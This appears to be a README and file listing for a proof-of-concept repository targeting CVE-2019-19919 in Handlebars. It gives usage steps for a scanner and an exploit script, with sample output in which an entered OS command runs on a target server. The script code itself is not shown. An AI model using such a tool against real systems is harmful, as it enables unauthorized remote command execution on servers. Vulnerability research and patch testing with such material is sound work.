Handlebars Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') Vulnerability# CVE-2019-19919
Handlebars Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') Vulnerability
pip install requests packaging
python handlebars_scanner.py
---------------------------------------
pip install requests
python handlebars_exploit.py
Enter the target URL:
Exploit Expected Output :
Enter the target URL (e.g., http://example.com/render): http://example.com/render
Enter the OS command to execute: ls
[+] Sending exploit payload to http://example.com/render...
[+] Payload executed successfully.
[+] Response:
file1.txt
file2.txt
[4.0K] /data/pocs/d5dc6157d124eb23eea33b8635e134e35632e29a
├── [1.3K] handlebars_exploit.py
├── [2.5K] handlebars_scanner.py
└── [ 599] README.md
0 directories, 3 files